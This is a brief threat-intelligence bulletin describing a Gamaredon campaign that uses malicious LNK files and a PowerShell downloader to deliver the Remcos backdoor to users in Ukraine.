Intel Name: Gamaredon campaign abuses lnk files to distribute remcos backdoor
Date of Scan: March 31, 2025
Impact: Medium
Summary: A campaign targeting users in Ukraine is using malicious LNK files, which run a PowerShell downloader. These files are named with Russian words related to troop movements in Ukraine to lure victims. The downloader connects to geo-fenced servers in Russia and Germany to retrieve a second-stage Zip file containing the Remcos backdoor. The backdoor is executed via DLL side loading. This activity is believed to be associated with the Gamaredon threat actor group.
